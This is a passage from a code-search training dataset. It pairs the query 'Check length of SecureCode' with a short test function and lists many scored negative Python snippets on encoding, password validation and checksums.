self.public_key.nsquare)\n self.__ciphertext = self.__ciphertext * r_pow_n % self.public_key.nsquare\n self.__is_obfuscated = True", "def uCSIsEnclosedAlphanumerics(code):\n ret = libxml2mod.xmlUCSIsEnclosedAlphanumerics(code)\n return ret", "def email_escape(string):\n return ''.join('&#x%x;' % (ord(c),) for c in string)", "def test_escape_argument_simple():\n encoded = win_functions.escape_argument(\"simple\")\n assert encoded == \"simple\"", "def _encode_urlplus(data: str) -> str:\n return urllib.parse.quote_plus(data, safe=\"\")", "def encode(key: str, clear: str) -> str:\n\n enc = []\n for i in range(len(clear)):\n key_c = key[i % len(key)]\n enc_c = chr((ord(clear[i]) + ord(key_c)) % 256)\n enc.append(enc_c)\n return base64.urlsafe_b64encode(\"\".join(enc).encode()).decode()", "def encode(message, cipher):\n return message.translate(str.maketrans(letters, ''.join(cipher)))", "def _escape_code(code: str) -> str:\n if code.isalnum() or code.replace(\".\", \"\").isalnum():\n return code\n # replace:\n # \\ -> \\\\\n # \" -> \\\"\n esc = code.replace(\"\\\\\", \"\\\\\\\\\").replace('\"', '\\\\\"')\n return f'\"{esc}\"'", "def encrypt(inp):\n # prepare plaintext\n prefix = \"comment1=cooking%20MCs;userdata=\"\n suffix = \";comment2=%20like%20a%20pound%20of%20bacon\"\n pt = inp.replace(\";\", \"\").replace(\"=\", \"\") # remove invalid character\n pt = prefix + pt + suffix # add prefix and suffix\n pt_encoded = pt.encode(\"utf-8\")\n pt_padded = pkcs7.add(pt_encoded, aes.S_BLOCK)\n\n # encrypt\n ct = aes.cbc_encrypt(pt_padded, KEY, IV)\n\n return ct" ]
[ "0.5938938", "0.5815948", "0.5810851", "0.5708405", "0.56919646", "0.5627045", "0.5606181", "0.5592183", "0.55913097", "0.55869216", "0.55449724", "0.55205464", "0.550454", "0.54743934", "0.5459042", "0.544217", "0.5438045", "0.5424514", "0.5418585", "0.54139405", "0.5389448", "0.5383088", "0.53789955", "0.5353896", "0.5353896", "0.53534156", "0.53528786", "0.5348257", "0.5333557", "0.5323421", "0.5318857", "0.53108984", "0.53108984", "0.5305031", "0.53049105", "0.5300222", "0.5299745", "0.52940524", "0.52866423", "0.5284398", "0.5256815", "0.52538997", "0.52464014", "0.5202234", "0.5197767", "0.5194464", "0.5184163", "0.5168935", "0.5163424", "0.51617867", "0.5161596", "0.51606375", "0.51496404", "0.5145018", "0.51411694", "0.51400334", "0.51307607", "0.51251054", "0.5105978", "0.51052284", "0.5099759", "0.5090243", "0.50839853", "0.50829655", "0.5079727", "0.5077902", "0.50742006", "0.50646216", "0.5060674", "0.50593466", "0.5056762", "0.50552016", "0.5039623", "0.5037394", "0.5035086", "0.5023805", "0.5018405", "0.5014711", "0.50140625", "0.5013668", "0.500484", "0.4993738", "0.499285", "0.49920368", "0.49898076", "0.49810806", "0.49773908", "0.49687195", "0.49668914", "0.49633166", "0.4959656", "0.49543676", "0.49430874", "0.49429813", "0.4932872", "0.49322197", "0.4930267", "0.49301288", "0.49260452", "0.4922359", "0.49209127" ]
0.0
-1
Check length of SecureCode (SecureCode= 1 )
def test_36(self): assert 'False' == Api.requestBlock('test-36')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def test_valid_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def test_valid_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def __len__(self):\n return len(self.code)", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def is_secure(self):\n return (self.nbits % 8 == 0) and (self.nbits >= params.MINIMUM_KEY_SIZE)", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def is_code_valid_checksum(processed_code):\n\n if processed_code.isnumeric():\n list_of_digits = [int(digit) for digit in processed_code]\n else:\n converted_digits = convert_code_to_decimal(processed_code)\n list_of_digits = [int(digit) for digit in converted_digits]\n\n return sum(list_of_digits) > 0 and get_calculated_checksum(list_of_digits) % 11 == 0", "def is_private(code):\n return 4000 <= code <= 4999", "def test_invalid_numeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == allowed_code_length_values_msg", "def __len__(self):\n return self.cli.passwords.len()", "def is_reserved(code):\n return 1000 <= code <= 2999", "def check_verify_code(self):\n r = self.session.get(self.check_url)\n s = r.text\n data = json.loads(s[s.index('{'):-1])\n if data.get('codestring'):\n return data.get('codestring', \"\")\n return \"\"", "def SecondPart():\n return passwordChecker(data)", "def test_invalid_numeric_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == parameter_is_too_long_msg.format('sender_id')", "def check(s1):\n chars = [0] * 128\n for c in s1:\n chars[ord(c)]+=1\n\n counter = 0\n for i in range(len(chars)):\n if chars[i] %2 != 0:\n counter+=1\n \n return counter <= 1", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def test_invalid_nonnumeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('code_length')", "def get_code_length(code):\n ignore = [\"{\", \"}\", \"(\", \")\", \";\", \":\"]\n for ig in ignore:\n code = code.replace(ig, \"\")\n return len([e.strip() for e in code.split(\"\\n\") if (not e.strip() == \"\") and (not e.strip() == u\"'\") and (not e.strip() == u\"u'\")])", "def verifyHashcode(digest):\n list_str = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\n list_num = [ 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 ]\n \n total = 0\n for i2 in range(len(digest)):\n digest_i = digest[i2]\n #print(\"digest_i =\", digest_i)\n \n for i1 in range(16):\n if digest_i == list_str[i1] and i2 != 0:\n total += list_num[i1]\n #print(\"total =\", total)\n #print(\"list_num[i1] =\", list_num[i1])\n continue\n \n #print(\"--- --- ---\")\n \n #print(\"total =\", total)\n \n checknum = total % 16\n #print(\"checknum =\", checknum)\n \n checkstr = list_str[checknum]\n #print(\"checkstr =\", checkstr)\n \n checkorg = digest[0]\n #print(\"checkorg =\", checkorg)\n \n if checkorg == checkstr:\n isValid = True\n else:\n isValid = False\n \n return isValid", "def checksum(code):\n return sum(code) % 256", "def check_valid_fernet(value):\n try:\n decoded = base64.urlsafe_b64decode(value)\n if len(decoded) != 32: return False\n return True\n except binascii.Error:\n return False", "def validate(msg):\n valid = True\n\n if not msg or len(msg) < 4:\n return False, -1, -1\n\n checksum = msg[-1]\n length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n # try:\n # # here works for pyton 3 only\n # length = int.from_bytes(msg[1:3], byteorder='big', signed=False)\n # except Exception:\n # length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n\n validlen = len(msg[3:-1])\n validsum = 0xFF - ((sum(msg[3:-1])) & 0xFF)\n\n # print('length: ' + str(self.length) + '; ' + str(validlen))\n # print('checksum: ' + str(self.checksum) + '; ' + str(validsum))\n\n # check sanity of computed Length and Checksum with the one in the message\n if (checksum != validsum) or (length != validlen):\n valid = False\n\n return valid, length, checksum", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n return val and secure_val == make_secure_val(val)", "def check_digit(raw_code):\n s = sum(code(char) * 2**index for index, char in enumerate(raw_code))\n return s % 11 % 10", "def check_pwd_policy1(processed):\n policy, letter, pwd = processed\n return pwd.count(letter) in policy", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def validate_code(request):\n user_id = api.keystone.get_user_id(request)\n print \"USER CHECK\"\n print user_id\n user = api.keystone.user_get(request, user_id)\n user_auth_code = request.GET.get('auth_code', None)\n secret = request.GET.get('secret', None)\n\n #Generate a code form our side using algorithm and use it to validate\n generated_code = api.keystone.generate_totp(secret)\n\n print secret\n print user_auth_code\n print generated_code\n print 'entering code comparison'\n \n data = {}\n extra = {}\n\n #Code comparison\n if user_auth_code == generated_code:\n data['totp_authenticated'] = True\n extra['two_factor_enabled'] = True\n\textra['secret_key'] = secret\n api.keystone.enable_2fa(request, user, **extra)\n else:\n \tprint 'falseeeeee'\n data['totp_authenticated'] = False\n return JsonResponse(data)", "def passWord(pwd):\n pwdLen = len(pwd)\n if pwdLen < 4:\n raise Exception(\"The password is too short.\")\n if pwdLen > 8:\n raise Exception(\"tHE password is too long\")\n else:\n print('the length of the password is correct.')", "def is_valid_two_digit_char(code: str) -> bool:\n\n return 10 <= int(code) <= 26", "def validate_password(data):\n\n if \"password\" not in data:\n return False\n password = data[\"password\"]\n if len(password) < 4 or len(password) > 16:\n return False\n\n return True", "def FirstPart(): \n return passwordChecker_incorrect(data)", "def is_valid_payload(p):\n # if the checksum is valid the checksum calculation, without removing the\n # checksum, should be equal to zero\n\n if checksum16(p) == 0:\n return True\n else:\n return False", "def code_verifier(n_bytes=64):\n verifier = base64.urlsafe_b64encode(os.urandom(n_bytes)).rstrip(b'=')\n # https://tools.ietf.org/html/rfc7636#section-4.1\n # minimum length of 43 characters and a maximum length of 128 characters.\n if len(verifier) < 43:\n raise ValueError(\"Verifier too short. n_bytes must be > 30.\")\n elif len(verifier) > 128:\n raise ValueError(\"Verifier too long. n_bytes must be < 97.\")\n else:\n return verifier", "def strlen(val): \n return len(val)", "def check_ean(eancode):\n if not eancode:\n return True\n if len(eancode) <> 13:\n return False\n try:\n int(eancode)\n except:\n return False\n return ean_checksum(eancode) == int(eancode[-1])", "def calculate_checksum(code):\n\n sum_odd = reduce(sum_chars, code[::2])\n sum_even = reduce(sum_chars, code[1:-1:2])\n check = (sum_even + sum_odd * 3) % 10\n\n if check == 0:\n return 0\n else:\n return 10 - check", "def symbol_len(password_length):\r\n while True:\r\n symb_length = input('How much symbols you want in password? At least 1 : ')\r\n try:\r\n symb_length = int(symb_length)\r\n if 1 <= symb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(symb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(symb_length))\r\n return symb_length", "def check_secure_val(hash_val):\n\n val = hash_val.split('|')[0]\n if hash_val == make_secure_val(val):\n return val", "def pwd_len():\r\n while True:\r\n password_length = input('How much length for password u want ? Minimum length is 6 and Maximum length is 25 : ')\r\n try:\r\n password_length = int(password_length)\r\n if 6 <= password_length <= 25:\r\n break\r\n else:\r\n print('{} is not in range'.format(password_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(password_length))\r\n return password_length", "def sanetoken(token):\n\t# len(CryptoHelper.longEncode(2**4096)) = 1372\n\tMAX_TOKEN_LEN = 1372\n\treturn len(token) <= MAX_TOKEN_LEN", "def check_password_strength():\r\n\r\n password_regex = re.compile(r'''(\r\n (?=.*[A-Z]{2})\r\n (?=.*[a-z]{3})\r\n (?=.*[/!@#$%^&_*+'\\\"-?.:;<>,])\r\n (?=.*[0-9])\r\n .{8,}\r\n )''', re.VERBOSE)\r\n\r\n get_password(password_regex)", "def test_valid_luhn(self):\n assert luhn_checksum(\"79927398713\") == 0", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def verify(self, k, code, counter = -1, window=30, allowed_steps=2):\n # if counter == -1:\n # verifycode = self.hotp(k, counter)\n # else:\n for i in range(0, allowed_steps + 1):\n c = hex(int((time.time() - i * window) // window))[2:]\n while len(c) < 16:\n c = \"0\" + c\n\n verifycode = self.totp(k, c, window=window)\n if code == verifycode:\n return True\n return False", "def test_password_strength_validator(self):\n self.assertIsNone(validate_password_strength('abcd123'))", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def check(string):\n if string[4]==\" \" and string[9]==\" \" and string[14]==\" \":\n add = 0\n count = 0\n for i in string:\n if 48<=ord(i)<= 57 or ord(i)==32:\n if 48 <= ord(i)<=57:\n add+=int(i)\n count+=1\n print(add,count)\n #return bool(count == 16)", "def strlen(self, tuple_data, val):\r\n return len(val)", "def strlen(self, tuple_data, val):\r\n return len(val)", "def test_password_length(self):\n response = self.client().post('/api/v1/auth/signup', data=self.user_data_4)\n self.assertEqual(response.status_code, 400)\n # return result in json format\n result = json.loads(response.data.decode())\n self.assertEqual(\n result[\"message\"], \"Password should not be less than four characters.\")", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def validate(info):\n\n\tif info == \"\": \n\t\treturn False\n\telse:\n\t\tif len(info) < 5 or len(info) > 32:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True", "def check_passcode_required(document_html):\n if \"visitor[passcode]\" in document_html:\n return True\n else:\n return False", "def isEncAddress(key):\n\tif re.search('^EAddr38[a-km-zA-HJ-NP-Z0-9]{56}$', key):\n\t\tif checkChecksum(key) is False:\n\t\t\treturn True, 'checksum'\n\t\treturn True, 'good'\n\telse:\n\t\treturn False, 'not valid'", "def bit_length(self, ???):", "def simple_validator(passport):\n if len(passport) == 8:\n return True\n if len(passport) == 7 and \"cid\" not in passport:\n return True\n return False", "def checkPacketLength(self):\n return self.packetLength == len(self) - PRIMARY_HEADER_BYTE_SIZE - 1", "def verify_code(email, val):\r\n # TODO: is this the right string?\r\n verification_string = email.lower() + '|' + val\r\n return hashlib.md5(verification_string).hexdigest()", "def valid_pass(password):\r\n if len(password) >= 8 and len(password) <= 25 and password != \"forgot\":\r\n return True\r\n\r\n else:\r\n print(\"This is not a vaid password\")\r\n print(\"Password should be between 8 and 25 letters\")\r\n\r\n return False", "def url_contains_auth_code(url: str) -> bool:\n return url.count(\"code=\") == 1", "def test_valid_length(self):\n f = lws.valid_length\n assert f('', [1]) is True\n assert f('+', [1, 1]) is True\n assert f('+', []) is False\n assert f('?', []) is True\n assert f('?', [1]) is True\n assert f('?', [1, 1]) is False\n assert f('?', [1, 1, 1]) is False\n assert f('*', []) is True\n assert f('*', [1, 1, 1]) is True", "def check(secret: bytes, b64str: str, values: Dict[str, Any]) -> bool:\n return check_with_reason(secret, b64str, values)[0]", "def test_generate_secret(self):\n random_secret = ef_password.generate_secret(24)\n self.assertEqual(len(random_secret), 24)\n assert not set('[~!@#$%^&*()_+{}\":;\\']+$').intersection(random_secret)", "def test_long_string_positive_length(self):\n self.failUnlessEqual(self.callFunc('encode_longstr', 'hello world'), '\\x00\\x00\\x00\\x0bhello world', 'positive length long string encoding FAILED...')", "def verify(self, code) -> bool:\n totp = self.__initialize_totp()\n return totp.verify(code)", "def checkZipCode(data):\n if len(data) < 5:\n while len(data) < 5:\n data = '0' + data\n elif len(data) > 5:\n data = data[0:4]\n # print(data)\n return (data)", "def ospf_lsa_checksum(lsa):\n return fletcher16_checkbytes(b\"\\x00\\x00\" + lsa[2:], 16) # leave out age", "def WinCheck(field):\n for i in range(len(field)):\n if field[i] == 2048:\n return True\n return False", "def test_short_string_positive_length(self):\n self.failUnlessEqual(self.callFunc('encode_shortstr', 'hello world'), '\\x0bhello world', 'positive length short string encoding FAILED...')", "def validate_key_code(self, code):\n\n key = self.connect().query(KeyCode)\\\n .filter(KeyCode.code == code)\\\n .first()\n\n if key and (key.user and key.enabled):\n return True\n return False", "def is_valid(self):\n if len(self) <= 64 and re.match(RE_VALID_UID, self):\n return True\n\n return False", "def check_pwd(password: str) -> bool:\n # if len(password) > 0 and password[0].isdigit():\n # upper: List[Any] = [letter for letter in password if letter.isupper()]\n # lower: List[Any] = [letter for letter in password if letter.islower()]\n # return len(upper) > 1 and len(lower) > 0\n # else:\n # return False\n # Professor's solution\n return len(password) >= 4 \\\n and sum([1 for c in password if c.isupper()]) >= 2 \\\n and sum([1 for c in password if c.islower()]) >= 1 \\\n and password[0].isdigit()", "def test_allowed_chars(self):\n hash_val = self.reverse_hash.get_hash('123')\n self.assertEqual(hash_val['error'], 'allowed chars {}'.format(self.reverse_hash.letters))", "def _validate_instruction_code_23E(self, val):\n validate_instruction_code(val)\n return val", "def request_two_factor_code(self):\n code = ''\n while not code:\n code = input('Enter 2FA code: ')\n return code", "def validate_signature(self):\n return self.signature == 0xAA55", "def alpha_len(password_length):\r\n while True:\r\n alphabet_length = input('How much alphabets you want in password? At least 1 : ')\r\n try:\r\n alphabet_length = int(alphabet_length)\r\n if 1 <= alphabet_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(alphabet_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(alphabet_length))\r\n return alphabet_length", "def verify(s):\n\t# Remove any spurious characters\n\ts = re.sub(r'[^0-9xX]', '', s).upper().strip()\n\n\tl = len(s)\n\n\tif l==10:\n\t\tif verify_10(s):\n\t\t\treturn s\n\telif l==13:\n\t\tif verify_13(s):\n\t\t\treturn s\n\n\t# It's not the right length to be an ISBN\n\treturn False", "def test_invalid_numeric_code_length_format(self, cred, language):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'lg': language})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('lg')", "def test_invalid_luhn(self):\n assert luhn_checksum(\"79927398714\") != 0", "def test_random_code_generator(self):\n # Produces similar to '8FHGNH'\n code = random_code_generator()\n self.assertEquals(len(code), 6)\n code_2 = random_code_generator()\n if code == code_2:\n self.assertEquals(False)\n # Produces similar to 'CFB-U8X-9KE-TY8':\n code_3 = random_code_generator(12, 4, '-')\n self.assertEquals(len(code_3), 15)\n self.assertEquals(len(code_3.replace('-', '')), 12)\n code_4 = random_code_generator(100, banned_chars='X')\n self.assertEquals(code_4.find('X'), -1)", "def len12(self, len): # -> None:\n ...", "def is_valid_control_number(id_code: str) -> bool:\n sum = 1 * int(id_code[:1]) + 2 * int(id_code[1:2]) + 3 * int(id_code[2:3]) + 4 * int(id_code[3:4]) + 5 * \\\n int(id_code[4:5]) + 6 * int(id_code[5:6]) + 7 * int(id_code[6:7]) + 8 * int(id_code[7:8]) + 9 *\\\n int(id_code[8:9]) + 1 * int(id_code[9:10])\n control_number = sum % 11\n if int(control_number) == int(id_code[10:11]):\n return True\n elif int(control_number) == 10:\n sum = 3 * int(id_code[:1]) + 4 * int(id_code[1:2]) + 5 * int(id_code[2:3]) + 6 * int(id_code[3:4]) + 7 * \\\n int(id_code[4:5]) + 8 * int(id_code[5:6]) + 9 * int(id_code[6:7]) + 1 * int(id_code[7:8]) + 2 * \\\n int(id_code[8:9]) + 3 * int(id_code[9:10])\n control_number = sum % 11\n if control_number == int(id_code[10:11]):\n return True\n elif control_number == 10:\n if int(id_code[10:11]) == 0:\n return True\n else:\n return False\n else:\n return False", "def check_record(self, record):\n checking = reduce(lambda x,y: x + y, [int(record[i*2:i*2+2], 16) for i in [x for x in xrange(len(record)/2)]])\n if ('%02x' % checking)[-2:] != '00':\n raise Exception ('ERROR: Checksum doesn\\' match! Record is %s' % (record, ))", "def read_code_chksum(ctl):\n\treturn ctl.bus_read_struct_coherent(tm.status_addr + 4, 'I')", "def valid_serial_key(serial_key):\n parts = serial_key.split('-')\n if len(parts) != 5:\n return False\n\n for part in parts:\n if not re.match('[A-Z0-9]{5}$', part):\n return False\n\n return True", "def validate_verification_code(self, device, code):\n #LOGGER.info(f\"Verification code-{code}\")\n device.update({'verificationCode': code, 'trustBrowser': True})\n data = json.dumps(device)\n\n try:\n self.session.post(\n f\"{self.SETUP_ENDPOINT}/validateVerificationCode\",\n params=self.params,\n data=data,\n )\n except PyiCloudAPIResponseException as error:\n LOGGER.info(f\"Verification Error code-{error.code}\")\n if error.code == -21669:\n # Wrong verification code\n return False\n #raise\n\n # Re-authenticate, which will both update the HSA data, and\n # ensure that we save the X-APPLE-WEBAUTH-HSA-TRUST cookie.\n self.authenticate()\n\n return not self.requires_2sa", "def test_right_checksum(self):\n self.assertEqual(utils.checksum('fooo'), 'L')", "def cleanCode(si):\n while len(si) < 4: si += 'x' # fill out the length of the code string\n so = \"\"\n for ii in range(4):\n if si[ii] in \"1234567890abcdefxyABCDEFX\": # check if this is a valid character\n# [0-9a-fA-FxyX]\n so += si[ii] # valid character\n else:\n so += \"xxxx\" # fill the string with 'x'\n ii = 4 # hit a bad one, stop checking string\n return so[:4] # clean code is 4 characters long", "def is_valid_part1(line):\n char_min, char_max, required_char, password = parse_line(line)\n char_count = password.count(required_char)\n if (char_min <= char_count <= char_max):\n return True\n return False", "def bech32_verify_checksum(hrp, data):\n return bech32_polymod(bech32_hrp_expand(hrp) + data) == 1", "def test_random_password():\n output = sh.random_password()\n assert isinstance(output, str) is True\n assert len(output) == 16" ]
[ "0.641404", "0.6408166", "0.6400148", "0.63096166", "0.62442255", "0.62413037", "0.616265", "0.60951114", "0.606613", "0.60156256", "0.5987383", "0.5973827", "0.5954586", "0.58762735", "0.58288664", "0.5818708", "0.5816221", "0.580496", "0.5798687", "0.5756989", "0.5754382", "0.57506204", "0.57454234", "0.5739592", "0.573679", "0.57038766", "0.56972295", "0.56972295", "0.5665901", "0.5650119", "0.56466365", "0.5643226", "0.5623543", "0.5615813", "0.5608662", "0.5595188", "0.55891144", "0.5588602", "0.55877", "0.5579061", "0.5568094", "0.5567063", "0.5566336", "0.5559184", "0.5554295", "0.55514485", "0.5547684", "0.5541313", "0.55148995", "0.5491818", "0.54854286", "0.54845583", "0.5478685", "0.5463714", "0.54561144", "0.54558927", "0.5449083", "0.5449083", "0.54412514", "0.54377", "0.5435044", "0.5417094", "0.5400456", "0.53986925", "0.53935736", "0.53928345", "0.5383975", "0.5381854", "0.5377882", "0.53750557", "0.53737193", "0.5369454", "0.53590715", "0.5354046", "0.535319", "0.5343734", "0.53401905", "0.5337463", "0.5318942", "0.5317899", "0.5313353", "0.5311056", "0.53066283", "0.5304315", "0.5303944", "0.52930075", "0.5289208", "0.52890486", "0.52846086", "0.52835685", "0.5280096", "0.52776504", "0.52736545", "0.52635914", "0.5256442", "0.52546173", "0.52526826", "0.5237914", "0.5229825", "0.5225429", "0.52244264" ]
0.0
-1
Check length of SecureCode (SecureCode= 12 )
def test_37(self): assert 'False' == Api.requestBlock('test-37')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def test_valid_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def test_valid_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def is_code_valid_checksum(processed_code):\n\n if processed_code.isnumeric():\n list_of_digits = [int(digit) for digit in processed_code]\n else:\n converted_digits = convert_code_to_decimal(processed_code)\n list_of_digits = [int(digit) for digit in converted_digits]\n\n return sum(list_of_digits) > 0 and get_calculated_checksum(list_of_digits) % 11 == 0", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def __len__(self):\n return len(self.code)", "def test_invalid_numeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == allowed_code_length_values_msg", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def is_valid_two_digit_char(code: str) -> bool:\n\n return 10 <= int(code) <= 26", "def test_invalid_numeric_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == parameter_is_too_long_msg.format('sender_id')", "def test_invalid_nonnumeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('code_length')", "def is_private(code):\n return 4000 <= code <= 4999", "def 